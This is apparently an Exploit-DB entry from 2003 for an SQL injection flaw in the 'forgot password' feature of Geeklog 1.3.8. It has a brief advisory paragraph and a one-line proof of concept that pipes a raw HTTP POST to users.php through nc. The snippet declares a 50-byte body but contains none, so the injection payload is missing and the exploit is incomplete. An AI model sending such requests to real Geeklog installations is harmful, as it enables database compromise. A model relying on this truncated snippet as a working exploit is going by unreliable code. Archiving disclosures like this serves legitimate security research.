Geeklog 1.3.8 Forgot Password SQL Injection Vulnerability

ID EDB-ID:23260
Type exploitdb
Reporter Jouko Pynnonen
Modified 2003-10-19T00:00:00


Geeklog 1.3.8 Forgot Password SQL Injection Vulnerability. Webapps exploit for php platform


An SQL injection vulnerability has been reported in the Geeklog "forgot password" feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. 


echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

" | nc localhost 80